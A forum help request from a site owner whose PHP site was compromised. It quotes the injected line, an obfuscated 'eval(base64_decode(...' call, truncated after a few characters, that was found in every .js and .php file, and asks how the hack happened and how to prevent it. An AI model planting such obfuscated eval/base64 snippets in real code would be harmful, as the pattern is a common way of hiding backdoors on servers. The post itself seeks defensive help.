Weblog Database

I Found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC

or a javascript line



so i knew that my site has been hacked..

so

1 - i want to know how to prevent anyone to hack my site?

i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST['name'])



is this true? and can it help me?

2- how did anyone hack my site??

3- how i can know what does this code mean???

thanks in advance and have a nice day



Please help me. i am in trouble..If this is not the right place to post.



Than i request to DP Admin that please move my post to right Forum.



Thanks